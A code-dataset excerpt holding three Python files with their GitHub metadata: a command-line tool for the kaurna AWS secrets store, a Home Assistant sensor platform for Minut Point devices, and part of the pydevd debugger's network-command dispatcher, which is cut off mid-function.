},
{
"name": "Python",
"bytes": "602347"
},
{
"name": "Ruby",
"bytes": "820"
}
],
"symlink_target": ""
} |
import argparse
import kaurna
class CLIDispatcher:
operation_info={
'create_kaurna_key':{
'help':'Create the kaurna KMS key and key alias. This must be called before kaurna can be used. Because creating KMS keys is a non-reversible operation, this must be done manually.',
'initial':'c'
},
'list_secrets':{
'help':'List the stored secrets. If you provide --secret-name, only versions of that secret will be shown. If you provide --secret-name and --secret-version, only the one secret/version will be shown.',
'initial':'l'
},
'rotate_keys':{
'help':'Rotate the data keys used for the provided secret, or for all secrets if no secret name is provided.',
'initial':'r'
},
'store_secret':{
'help':'Store a new secret.',
'initial':'s'
},
'erase_secret':{
        'help':'Erase the provided secret from kaurna. Can be used to delete all versions of a secret, but cannot be used to delete all secrets at once. For that, use --erase-all-the-things.',
'initial':'e'
},
'deprecate_secrets':{
'help':'Mark the provided secret as deprecated to prevent automated usage.',
'initial':'d'
},
'activate_secrets':{
'help':'Mark the provided secret as active to allow automated usage.',
'initial':'a'
},
'update_secrets':{
'help':'Update the list of entities allowed to access a secret, and rotate the data key.',
'initial':'u'
},
'get_secret':{
'help':'Download the desired secret. This will print it to stdout; if you don\'t want it to appear on the screen, you can pipe the output of this command to a file or to a clipboard program like pbcopy or xclip (which one to use varies based on your OS).',
'initial':'g'
},
'erase_all_the_things':{
'help':'Erase every secret. Only use this as a last resort. Even if you pass in --force, this will require a prompt.',
'initial':None
}
}
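    # Illustrative only: get_argument_parser() below derives the CLI flags from
    # this table, e.g. 'store_secret' with initial 's' becomes -s/--store-secret,
    # and 'erase_all_the_things' (no initial) becomes --erase-all-the-things.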
def list_secrets(self, **kwargs):
secrets = kaurna.describe_secrets(secret_name=kwargs['secret_name'], secret_version=kwargs['secret_version'], region=kwargs['region'])
for secret in secrets.keys():
print('Secret name: {0}'.format(secret))
for version in secrets[secret].keys():
print(' Version: {0}'.format(version))
print(' Authorized entities: {0}'.format(', '.join(secrets[secret][version]['authorized_entities']) if secrets[secret][version]['authorized_entities'] else '[None]'))
print(' Deprecated: {0}'.format('Yes' if secrets[secret][version]['deprecated'] else 'No'))
print(' Created: {0}'.format(secrets[secret][version]['create_date']))
print(' Last data key rotation: {0}'.format(secrets[secret][version]['last_data_key_rotation']))
def rotate_keys(self, **kwargs):
kaurna.rotate_data_keys(**kwargs)
def store_secret(self, **kwargs):
kaurna.store_secret(**kwargs)
def create_kaurna_key(self, **kwargs):
print('About to create the kaurna KMS key.')
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Proceed? Y/N ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
if kaurna.create_kaurna_key(**kwargs):
print('KMS key with alias \'kaurna\' created.')
else:
print('KMS key with alias \'kaurna\' already exists. No need to create.')
def erase_secret(self, **kwargs):
if not kwargs['secret_name']:
print('Must provide secret_name.')
exit(1)
print('About to delete the following secrets:')
secrets = kaurna.load_all_entries(attributes_to_get=['secret_name','secret_version'], **kwargs)
for secret in sorted(secrets, key=lambda s: '{0}/{1}'.format(s['secret_name'], s['secret_version'])):
print('Name: {0}, version {1}'.format(secret['secret_name'], secret['secret_version']))
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
kaurna.erase_secret(**kwargs)
    # Note: this method hasn't yet been manually tested in its latest form.
def deprecate_secrets(self, **kwargs):
secrets = kaurna.load_all_entries(attributes_to_get=['secret_name','secret_version','deprecated'], **kwargs)
sorted_secrets = sorted([secret for secret in secrets if not secret['deprecated']], key=lambda s: '{0}/{1}'.format(s['secret_name'], s['secret_version']))
if sorted_secrets:
print('About to deprecate the following secrets:')
for secret in sorted_secrets:
print('Name: {0}, version {1}'.format(secret['secret_name'], secret['secret_version']))
if kwargs['force']:
print('--force provided. Skipping prompt.')
else:
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
kaurna.deprecate_secrets(**kwargs)
else:
print('No active secrets matching those parameters found.')
def activate_secrets(self, **kwargs):
kaurna.activate_secrets(**kwargs)
def update_secrets(self, **kwargs):
kaurna.update_secrets(**kwargs)
def get_secret(self, **kwargs):
print(kaurna.get_secret(**kwargs))
def erase_all_the_things(self, **kwargs):
seriously=False
print('YOU ARE ABOUT TO DELETE THE KAURNA DYNAMODB TABLE. THIS WILL DELETE EVERYTHING.')
print('Are you really sure you want to do this?')
response = raw_input('Y/N? ')
if response.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
response2 = raw_input('Seriously? Y/N ')
if response2.strip().lower() not in ['y','yes']:
print('Aborted.')
exit(1)
else:
seriously=True
kaurna.erase_all_the_things(seriously=seriously, **kwargs)
        exit(0)  # erase succeeded; don't signal failure via the exit code
def get_argument_parser(self):
parser = argparse.ArgumentParser(description='Interact with kaurna from the command line.')
operations = parser.add_mutually_exclusive_group(required=True)
for operation in self.operation_info.keys():
op = self.operation_info[operation]
operation_cli = '--{0}'.format(operation.replace('_','-'))
if op['initial']:
operations.add_argument('-{0}'.format(op['initial']), operation_cli, action='store_true', help='Operation: {0}'.format(op['help']))
else:
operations.add_argument(operation_cli, action='store_true', help='Operation: {0}'.format(op['help']))
parser.add_argument('--region', default='us-east-1', help='Argument: The AWS region to use.')
parser.add_argument('--secret-name', default=None, help='Argument: The name of the secret. Required for erase-secret, store-secret, and get-secret. Optional for list-secrets, rotate-keys, deprecate-secrets, activate-secrets, and update-secrets.')
parser.add_argument('--secret-version', default=None, help='Argument: The version of the secret to use. If this is provided, secret-name must also be provided. Optional for list-secrets, rotate-keys, store-secret, erase-secrets, deprecate-secrets, activate-secrets, update-secrets, and get-secret.')
parser.add_argument('--secret', default=None, help='Argument: The secret to store. Currently the only way to enter it is here, but I\'ll add a way to enter it that doesn\'t display it later. Required for store-secret.')
parser.add_argument('--authorized-entities', nargs='+', help='Argument: The entities that should have permission to access the secret(s). Optional for update-secrets and store-secret; if not provided the empty list will be used.')
parser.add_argument('-f', '--force', action='store_true', help='Argument: Skip normal confirmation prompts. Optional for all calls. Ignored by erase-all-the-things.')
parser.add_argument('-v', '--verbose', action='store_true', help='Argument: Print random usually-useless information. May or may not print anything depending on whether or not I\'ve implemented it yet, as I haven\'t right now. Optional for all calls.')
return parser
def handle_args(self, args):
operation = None
argdict = {}
for pair in args._get_kwargs():
if pair[0] in self.operation_info.keys():
operation = operation if not pair[1] else pair[0]
else:
argdict[pair[0]] = pair[1]
try:
getattr(self, operation)(**argdict)
except Exception as e:
            print(str(e))  # str(e) works on both Python 2 and 3; e.message is Python 2 only
exit(1)
def do_stuff(self):
parser = self.get_argument_parser()
args = parser.parse_args()
self.handle_args(args)
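# Hypothetical entry point (not part of the original module; the installed
# console script may wire this up differently):
if __name__ == '__main__':
    CLIDispatcher().do_stuff()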
| {
"content_hash": "24ebb40bbd1580dc4f9365d18020778f",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 309,
"avg_line_length": 52.574585635359114,
"alnum_prop": 0.5916351408154686,
"repo_name": "edofleini/kaurna",
"id": "7b287be3ba8387f60fb73a502a5a69fcb0ef730f",
"size": "9539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kaurna/cli.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67606"
}
],
"symlink_target": ""
} |
"""Support for Minut Point sensors."""
import logging
from homeassistant.components.sensor import DOMAIN
from homeassistant.const import (
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
UNIT_PERCENTAGE,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.util.dt import parse_datetime
from . import MinutPointEntity
from .const import DOMAIN as POINT_DOMAIN, POINT_DISCOVERY_NEW
_LOGGER = logging.getLogger(__name__)
DEVICE_CLASS_SOUND = "sound_level"
SENSOR_TYPES = {
DEVICE_CLASS_TEMPERATURE: (None, 1, TEMP_CELSIUS),
DEVICE_CLASS_PRESSURE: (None, 0, "hPa"),
DEVICE_CLASS_HUMIDITY: (None, 1, UNIT_PERCENTAGE),
DEVICE_CLASS_SOUND: ("mdi:ear-hearing", 1, "dBa"),
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up a Point's sensors based on a config entry."""
async def async_discover_sensor(device_id):
"""Discover and add a discovered sensor."""
client = hass.data[POINT_DOMAIN][config_entry.entry_id]
async_add_entities(
(
MinutPointSensor(client, device_id, sensor_type)
for sensor_type in SENSOR_TYPES
),
True,
)
async_dispatcher_connect(
hass, POINT_DISCOVERY_NEW.format(DOMAIN, POINT_DOMAIN), async_discover_sensor
)
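# Hedged note: the integration's setup code is expected to fire
# async_dispatcher_send(hass, POINT_DISCOVERY_NEW.format(DOMAIN, POINT_DOMAIN),
# device_id) for each newly seen device, which is what invokes
# async_discover_sensor() above.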
class MinutPointSensor(MinutPointEntity):
"""The platform class required by Home Assistant."""
def __init__(self, point_client, device_id, device_class):
"""Initialize the sensor."""
super().__init__(point_client, device_id, device_class)
self._device_prop = SENSOR_TYPES[device_class]
async def _update_callback(self):
"""Update the value of the sensor."""
if self.is_updated:
_LOGGER.debug("Update sensor value for %s", self)
self._value = await self.hass.async_add_executor_job(
self.device.sensor, self.device_class
)
self._updated = parse_datetime(self.device.last_update)
self.async_write_ha_state()
@property
def icon(self):
"""Return the icon representation."""
return self._device_prop[0]
@property
def state(self):
"""Return the state of the sensor."""
if self.value is None:
return None
return round(self.value, self._device_prop[1])
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._device_prop[2]
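# A minimal sketch of how a SENSOR_TYPES entry drives the properties above
# (illustrative values only):
#
#   icon, precision, unit = SENSOR_TYPES[DEVICE_CLASS_SOUND]  # ("mdi:ear-hearing", 1, "dBa")
#   state = round(35.27, precision)  # -> 35.3, reported with unit "dBa"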
| {
"content_hash": "005fd9133b51be4d3ac79e17334de291",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 85,
"avg_line_length": 31.463414634146343,
"alnum_prop": 0.6406976744186047,
"repo_name": "pschmitt/home-assistant",
"id": "70fe1ef0b6dc27d781641ed20b26df30efb94711",
"size": "2580",
"binary": false,
"copies": "5",
"ref": "refs/heads/dev",
"path": "homeassistant/components/point/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1522"
},
{
"name": "Python",
"bytes": "24807200"
},
{
"name": "Shell",
"bytes": "4342"
}
],
"symlink_target": ""
} |
import os
import sys
import traceback
from _pydev_bundle import pydev_log
from _pydevd_bundle import pydevd_traceproperty, pydevd_dont_trace, pydevd_utils
import pydevd_tracing
import pydevd_file_utils
from _pydevd_bundle.pydevd_breakpoints import LineBreakpoint, get_exception_class
from _pydevd_bundle.pydevd_comm import (CMD_RUN, CMD_VERSION, CMD_LIST_THREADS, CMD_THREAD_KILL,
CMD_THREAD_SUSPEND, pydevd_find_thread_by_id, CMD_THREAD_RUN, InternalRunThread, CMD_STEP_INTO, CMD_STEP_OVER,
CMD_STEP_RETURN, CMD_STEP_INTO_MY_CODE, InternalStepThread, CMD_RUN_TO_LINE, CMD_SET_NEXT_STATEMENT,
CMD_SMART_STEP_INTO, InternalSetNextStatementThread, CMD_RELOAD_CODE, ReloadCodeCommand, CMD_CHANGE_VARIABLE,
InternalChangeVariable, CMD_GET_VARIABLE, InternalGetVariable, CMD_GET_ARRAY, InternalGetArray, CMD_GET_COMPLETIONS,
InternalGetCompletions, CMD_GET_FRAME, InternalGetFrame, CMD_SET_BREAK, file_system_encoding, CMD_REMOVE_BREAK,
CMD_EVALUATE_EXPRESSION, CMD_EXEC_EXPRESSION, InternalEvaluateExpression, CMD_CONSOLE_EXEC, InternalConsoleExec,
CMD_SET_PY_EXCEPTION, CMD_GET_FILE_CONTENTS, CMD_SET_PROPERTY_TRACE, CMD_ADD_EXCEPTION_BREAK,
CMD_REMOVE_EXCEPTION_BREAK, CMD_LOAD_SOURCE, CMD_ADD_DJANGO_EXCEPTION_BREAK, CMD_REMOVE_DJANGO_EXCEPTION_BREAK,
CMD_EVALUATE_CONSOLE_EXPRESSION, InternalEvaluateConsoleExpression, InternalConsoleGetCompletions,
CMD_RUN_CUSTOM_OPERATION, InternalRunCustomOperation, CMD_IGNORE_THROWN_EXCEPTION_AT, CMD_ENABLE_DONT_TRACE,
CMD_SHOW_RETURN_VALUES, CMD_SET_UNIT_TEST_DEBUGGING_MODE, ID_TO_MEANING, CMD_GET_DESCRIPTION, InternalGetDescription,
InternalLoadFullValue, CMD_LOAD_FULL_VALUE, CMD_PROCESS_CREATED_MSG_RECEIVED, CMD_REDIRECT_OUTPUT, CMD_GET_NEXT_STATEMENT_TARGETS,
InternalGetNextStatementTargets, CMD_SET_PROJECT_ROOTS, CMD_GET_SMART_STEP_INTO_VARIANTS,
CMD_GET_THREAD_STACK, CMD_THREAD_DUMP_TO_STDERR, CMD_STOP_ON_START, CMD_GET_EXCEPTION_DETAILS, NetCommand,
CMD_SET_PROTOCOL, CMD_PYDEVD_JSON_CONFIG, InternalGetThreadStack, InternalSmartStepInto, InternalGetSmartStepIntoVariants,
CMD_DATAVIEWER_ACTION, InternalDataViewerAction, CMD_TABLE_EXEC, InternalTableCommand, CMD_INTERRUPT_DEBUG_CONSOLE, CMD_SET_USER_TYPE_RENDERERS)
from _pydevd_bundle.pydevd_constants import (get_thread_id, IS_PY3K, DebugInfoHolder, dict_keys, STATE_RUN,
NEXT_VALUE_SEPARATOR, IS_WINDOWS, get_current_thread_id)
from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info
from _pydev_imps._pydev_saved_modules import threading
import json
from _pydevd_bundle.pydevd_user_type_renderers import parse_set_type_renderers_message
def process_net_command(py_db, cmd_id, seq, text):
    '''Processes a command received from the Java side.
    @param cmd_id: the id of the command
    @param seq: the sequence number of the command
    @param text: the text received in the command
    @note: this method is run as a big switch. After some testing, it's not clear whether changing it to a
    dict id --> function dispatch would perform better. A simple test with xrange(10000000) showed that the
    gain from fast handler lookup is lost to the extra function call: with about 10 elements in the switch
    the if..elif chain is faster, but the dispatch solution looks better as the number of choices grows. So,
    if this gets to more than 20-25 choices at some point, it may be worth refactoring (actually, reordering
    the ifs so that the most frequently used come first will probably give better performance).
'''
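    # A sketch of the dispatch-table alternative discussed above (illustrative
    # only; _handle_run and _handle_version are hypothetical helpers):
    #
    #   _DISPATCH = {CMD_RUN: _handle_run, CMD_VERSION: _handle_version}
    #   handler = _DISPATCH.get(cmd_id)
    #   if handler is not None:
    #       handler(py_db, seq, text)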
# print(ID_TO_MEANING[str(cmd_id)], repr(text))
if cmd_id == CMD_INTERRUPT_DEBUG_CONSOLE:
# Must be executed outside of lock and in the non-main thread
from _pydevd_bundle.pydevd_console_integration import interrupt_debug_console
interrupt_debug_console()
return
py_db._main_lock.acquire()
try:
try:
cmd = None
if cmd_id == CMD_RUN:
py_db.ready_to_run = True
elif cmd_id == CMD_SET_PROTOCOL:
expected = (NetCommand.HTTP_PROTOCOL, NetCommand.QUOTED_LINE_PROTOCOL)
text = text.strip()
assert text.strip() in expected, 'Protocol (%s) should be one of: %s' % (
text, expected)
NetCommand.protocol = text
cmd = py_db.cmd_factory.make_protocol_set_message(seq)
elif cmd_id == CMD_VERSION:
# response is version number
# ide_os should be 'WINDOWS' or 'UNIX'.
# Default based on server process (although ideally the IDE should
# provide it).
if IS_WINDOWS:
ide_os = 'WINDOWS'
else:
ide_os = 'UNIX'
# Breakpoints can be grouped by 'LINE' or by 'ID'.
breakpoints_by = 'LINE'
splitted = text.split('\t')
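                # e.g. text == '1.1\tWINDOWS\tID' (illustrative) -> local version, IDE OS, breakpoints grouped by id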
if len(splitted) == 1:
_local_version = splitted
elif len(splitted) == 2:
_local_version, ide_os = splitted
elif len(splitted) == 3:
_local_version, ide_os, breakpoints_by = splitted
if breakpoints_by == 'ID':
py_db._set_breakpoints_with_id = True
else:
py_db._set_breakpoints_with_id = False
pydevd_file_utils.set_ide_os(ide_os)
cmd = py_db.cmd_factory.make_version_message(seq)
elif cmd_id == CMD_LIST_THREADS:
# response is a list of threads
cmd = py_db.cmd_factory.make_list_threads_message(seq)
elif cmd_id == CMD_GET_THREAD_STACK:
# Receives a thread_id and a given timeout, which is the time we should
# wait to the provide the stack if a given thread is still not suspended.
if '\t' in text:
thread_id, timeout = text.split('\t')
timeout = float(timeout)
else:
thread_id = text
timeout = .5 # Default timeout is .5 seconds
# If it's already suspended, get it right away.
internal_get_thread_stack = InternalGetThreadStack(seq, thread_id, py_db, set_additional_thread_info, timeout=timeout)
if internal_get_thread_stack.can_be_executed_by(get_current_thread_id(threading.current_thread())):
internal_get_thread_stack.do_it(py_db)
else:
py_db.post_internal_command(internal_get_thread_stack, '*')
elif cmd_id == CMD_THREAD_SUSPEND:
# Yes, thread suspend is done at this point, not through an internal command.
threads = []
suspend_all = text.strip() == '*'
if suspend_all:
threads = pydevd_utils.get_non_pydevd_threads()
elif text.startswith('__frame__:'):
sys.stderr.write("Can't suspend tasklet: %s\n" % (text,))
else:
threads = [pydevd_find_thread_by_id(text)]
for t in threads:
if t is None:
continue
py_db.set_suspend(
t,
CMD_THREAD_SUSPEND,
suspend_other_threads=suspend_all,
is_pause=True,
)
# Break here (even if it's suspend all) as py_db.set_suspend will
# take care of suspending other threads.
break
elif cmd_id == CMD_THREAD_RUN:
threads = []
if text.strip() == '*':
threads = pydevd_utils.get_non_pydevd_threads()
elif text.startswith('__frame__:'):
sys.stderr.write("Can't make tasklet run: %s\n" % (text,))
else:
threads = [pydevd_find_thread_by_id(text)]
for t in threads:
if t is None:
continue
additional_info = set_additional_thread_info(t)
additional_info.pydev_step_cmd = -1
additional_info.pydev_step_stop = None
additional_info.pydev_state = STATE_RUN
elif cmd_id == CMD_STEP_INTO or cmd_id == CMD_STEP_OVER or cmd_id == CMD_STEP_RETURN or \
cmd_id == CMD_STEP_INTO_MY_CODE:
# we received some command to make a single step
t = pydevd_find_thread_by_id(text)
if t:
thread_id = get_thread_id(t)
int_cmd = InternalStepThread(thread_id, cmd_id)
py_db.post_internal_command(int_cmd, thread_id)
elif text.startswith('__frame__:'):
sys.stderr.write("Can't make tasklet step command: %s\n" % (text,))
elif cmd_id in (CMD_RUN_TO_LINE, CMD_SET_NEXT_STATEMENT, CMD_SMART_STEP_INTO):
if cmd_id == CMD_SMART_STEP_INTO:
# we received a smart step into command
thread_id, frame_id, line, func_name, call_order, start_line, end_line = text.split('\t', 6)
else:
# we received some command to make a single step
thread_id, line, func_name = text.split('\t', 2)
if func_name == "None":
# global context
func_name = ''
t = pydevd_find_thread_by_id(thread_id)
if t:
if cmd_id == CMD_SMART_STEP_INTO:
int_cmd = InternalSmartStepInto(thread_id, frame_id, cmd_id, func_name, line, call_order, start_line, end_line, seq)
else:
int_cmd = InternalSetNextStatementThread(thread_id, cmd_id, line, func_name, seq)
py_db.post_internal_command(int_cmd, thread_id)
elif thread_id.startswith('__frame__:'):
sys.stderr.write("Can't set next statement in tasklet: %s\n" % (thread_id,))
elif cmd_id == CMD_RELOAD_CODE:
# we received some command to make a reload of a module
module_name = text.strip()
thread_id = '*' # Any thread
# Note: not going for the main thread because in this case it'd only do the load
# when we stopped on a breakpoint.
int_cmd = ReloadCodeCommand(module_name, thread_id)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_CHANGE_VARIABLE:
# the text is: thread\tstackframe\tFRAME|GLOBAL\tattribute_to_change\tvalue_to_change
try:
thread_id, frame_id, scope, attr_and_value = text.split('\t', 3)
tab_index = attr_and_value.rindex('\t')
attr = attr_and_value[0:tab_index].replace('\t', '.')
value = attr_and_value[tab_index + 1:]
int_cmd = InternalChangeVariable(seq, thread_id, frame_id, scope, attr, value)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_VARIABLE:
# we received some command to get a variable
# the text is: thread_id\tframe_id\tFRAME|GLOBAL\tattributes*
try:
thread_id, frame_id, scopeattrs = text.split('\t', 2)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, _, attrs = scopeattrs.split('\t', 2)
else:
scope, attrs = (scopeattrs, None)
int_cmd = InternalGetVariable(seq, thread_id, frame_id, scope, attrs)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_ARRAY:
# we received some command to get an array variable
# the text is: thread_id\tframe_id\tFRAME|GLOBAL\tname\ttemp\troffs\tcoffs\trows\tcols\tformat
try:
roffset, coffset, rows, cols, format, thread_id, frame_id, scopeattrs = text.split('\t', 7)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, _, attrs = scopeattrs.split('\t', 2)
else:
scope, attrs = (scopeattrs, None)
int_cmd = InternalGetArray(seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_SHOW_RETURN_VALUES:
try:
show_return_values = text.split('\t')[1]
if int(show_return_values) == 1:
py_db.show_return_values = True
else:
if py_db.show_return_values:
# We should remove saved return values
py_db.remove_return_values_flag = True
py_db.show_return_values = False
pydev_log.debug("Show return values: %s\n" % py_db.show_return_values)
except:
traceback.print_exc()
elif cmd_id == CMD_SET_UNIT_TEST_DEBUGGING_MODE:
py_db.set_unit_tests_debugging_mode()
elif cmd_id == CMD_LOAD_FULL_VALUE:
try:
thread_id, frame_id, scopeattrs = text.split('\t', 2)
vars = scopeattrs.split(NEXT_VALUE_SEPARATOR)
int_cmd = InternalLoadFullValue(seq, thread_id, frame_id, vars)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_COMPLETIONS:
# we received some command to get a variable
# the text is: thread_id\tframe_id\tactivation token
try:
thread_id, frame_id, scope, act_tok = text.split('\t', 3)
int_cmd = InternalGetCompletions(seq, thread_id, frame_id, act_tok)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_DESCRIPTION:
try:
thread_id, frame_id, expression = text.split('\t', 2)
int_cmd = InternalGetDescription(seq, thread_id, frame_id, expression)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_GET_FRAME:
thread_id, frame_id, scope, group_type = text.split('\t', 3)
int_cmd = InternalGetFrame(seq, thread_id, frame_id, int(group_type))
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_BREAK:
                # func name: 'None' matches anything; an empty string matches the global context; a
                # specific name matches only that method's context.
                # Command to add a breakpoint.
# text is file\tline. Add to breakpoints dictionary
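                # Illustrative wire format with ids enabled (placeholder values):
                # '3\tpython-line\t/proj/app.py\t12\tmain\tNone\tNone\tNone\tFalse\tNONE'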
suspend_policy = "NONE" # Can be 'NONE' or 'ALL'
is_logpoint = False
hit_condition = None
if py_db._set_breakpoints_with_id:
try:
try:
breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint, suspend_policy = text.split('\t', 9)
except ValueError: # not enough values to unpack
# No suspend_policy passed (use default).
breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint = text.split('\t', 8)
is_logpoint = is_logpoint == 'True'
except ValueError: # not enough values to unpack
breakpoint_id, type, file, line, func_name, condition, expression = text.split('\t', 6)
breakpoint_id = int(breakpoint_id)
line = int(line)
# We must restore new lines and tabs as done in
# AbstractDebugTarget.breakpointAdded
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
else:
# Note: this else should be removed after PyCharm migrates to setting
# breakpoints by id (and ideally also provides func_name).
type, file, line, func_name, suspend_policy, condition, expression = text.split('\t', 6)
# If we don't have an id given for each breakpoint, consider
# the id to be the line.
breakpoint_id = line = int(line)
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
replace("@_@TAB_CHAR@_@", '\t').strip()
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
file = file.encode(file_system_encoding)
if pydevd_file_utils.is_real_file(file):
file = pydevd_file_utils.norm_file_to_server(file)
if not pydevd_file_utils.exists(file):
sys.stderr.write('pydev debugger: warning: trying to add breakpoint'
' to file that does not exist: %s (will have no effect)\n' % (file,))
sys.stderr.flush()
if condition is not None and (len(condition) <= 0 or condition == "None"):
condition = None
if expression is not None and (len(expression) <= 0 or expression == "None"):
expression = None
if hit_condition is not None and (len(hit_condition) <= 0 or hit_condition == "None"):
hit_condition = None
if type == 'python-line':
breakpoint = LineBreakpoint(line, condition, func_name, expression, suspend_policy, hit_condition=hit_condition, is_logpoint=is_logpoint)
breakpoints = py_db.breakpoints
file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
supported_type = True
else:
result = None
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
result = plugin.add_breakpoint('add_line_breakpoint', py_db, type, file, line, condition, expression, func_name, hit_condition=hit_condition, is_logpoint=is_logpoint)
if result is not None:
supported_type = True
breakpoint, breakpoints = result
file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
else:
supported_type = False
if not supported_type:
if type == 'jupyter-line':
return
else:
raise NameError(type)
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.debug('Added breakpoint:%s - line:%s - func_name:%s\n' % (file, line, func_name.encode('utf-8')))
sys.stderr.flush()
if file in file_to_id_to_breakpoint:
id_to_pybreakpoint = file_to_id_to_breakpoint[file]
else:
id_to_pybreakpoint = file_to_id_to_breakpoint[file] = {}
id_to_pybreakpoint[breakpoint_id] = breakpoint
py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
if py_db.plugin is not None:
py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()
if py_db.has_plugin_line_breaks:
py_db.frame_eval_func = None
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_BREAK:
#command to remove some breakpoint
            #text is type\tfile\tid. Remove from breakpoints dictionary
breakpoint_type, file, breakpoint_id = text.split('\t', 2)
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
file = file.encode(file_system_encoding)
if pydevd_file_utils.is_real_file(file):
file = pydevd_file_utils.norm_file_to_server(file)
try:
breakpoint_id = int(breakpoint_id)
except ValueError:
pydev_log.error('Error removing breakpoint. Expected breakpoint_id to be an int. Found: %s' % (breakpoint_id,))
else:
file_to_id_to_breakpoint = None
if breakpoint_type == 'python-line':
breakpoints = py_db.breakpoints
file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
elif py_db.get_plugin_lazy_init() is not None:
result = py_db.plugin.get_breakpoints(py_db, breakpoint_type)
if result is not None:
file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
breakpoints = result
if file_to_id_to_breakpoint is None:
pydev_log.error("Error removing breakpoint. Can't handle breakpoint of type %s" % breakpoint_type)
else:
try:
id_to_pybreakpoint = file_to_id_to_breakpoint.get(file, {})
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
existing = id_to_pybreakpoint[breakpoint_id]
sys.stderr.write('Removed breakpoint:%s - line:%s - func_name:%s (id: %s)\n' % (
file, existing.line, existing.func_name.encode('utf-8'), breakpoint_id))
del id_to_pybreakpoint[breakpoint_id]
py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
if py_db.plugin is not None:
py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()
except KeyError:
pydev_log.error("Error removing breakpoint: Breakpoint id not found: %s id: %s. Available ids: %s\n" % (
file, breakpoint_id, dict_keys(id_to_pybreakpoint)))
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_EVALUATE_EXPRESSION or cmd_id == CMD_EXEC_EXPRESSION:
#command to evaluate the given expression
#text is: thread\tstackframe\tLOCAL\texpression
temp_name = ""
try:
thread_id, frame_id, scope, expression, trim, temp_name = text.split('\t', 5)
except ValueError:
thread_id, frame_id, scope, expression, trim = text.split('\t', 4)
int_cmd = InternalEvaluateExpression(seq, thread_id, frame_id, expression,
cmd_id == CMD_EXEC_EXPRESSION, int(trim) == 1, temp_name)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_CONSOLE_EXEC:
#command to exec expression in console, in case expression is only partially valid 'False' is returned
#text is: thread\tstackframe\tLOCAL\texpression
thread_id, frame_id, scope, expression = text.split('\t', 3)
int_cmd = InternalConsoleExec(seq, thread_id, frame_id, expression)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_PY_EXCEPTION:
# Command which receives set of exceptions on which user wants to break the debugger
# text is:
#
# break_on_uncaught;
# break_on_caught;
# skip_on_exceptions_thrown_in_same_context;
# ignore_exceptions_thrown_in_lines_with_ignore_exception;
# ignore_libraries;
# TypeError;ImportError;zipimport.ZipImportError;
#
# i.e.: true;true;true;true;true;TypeError;ImportError;zipimport.ZipImportError;
#
# This API is optional and works 'in bulk' -- it's possible
# to get finer-grained control with CMD_ADD_EXCEPTION_BREAK/CMD_REMOVE_EXCEPTION_BREAK
# which allows setting caught/uncaught per exception.
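# In the example above, splitted[0:5] carry the five booleans and splitted[5:]
# the exception names; the empty string left by the trailing ';' is skipped by
# the 'if not exception_type: continue' check below.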
splitted = text.split(';')
py_db.break_on_uncaught_exceptions = {}
